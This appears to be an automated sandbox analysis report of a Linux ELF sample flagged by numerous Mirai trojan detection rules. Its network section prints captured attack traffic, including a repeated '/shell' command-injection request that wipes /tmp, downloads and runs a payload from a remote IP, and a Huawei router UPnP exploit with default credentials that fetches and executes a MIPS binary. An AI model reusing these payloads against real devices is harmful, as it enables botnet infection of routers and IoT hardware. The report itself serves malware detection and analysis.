          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficDNS traffic detected: DNS query: scamanje.stresserit.pro
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

          barindex
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: x86.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6222.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: x86.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
          Source: 6220.1.0000000008048000.0000000008058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
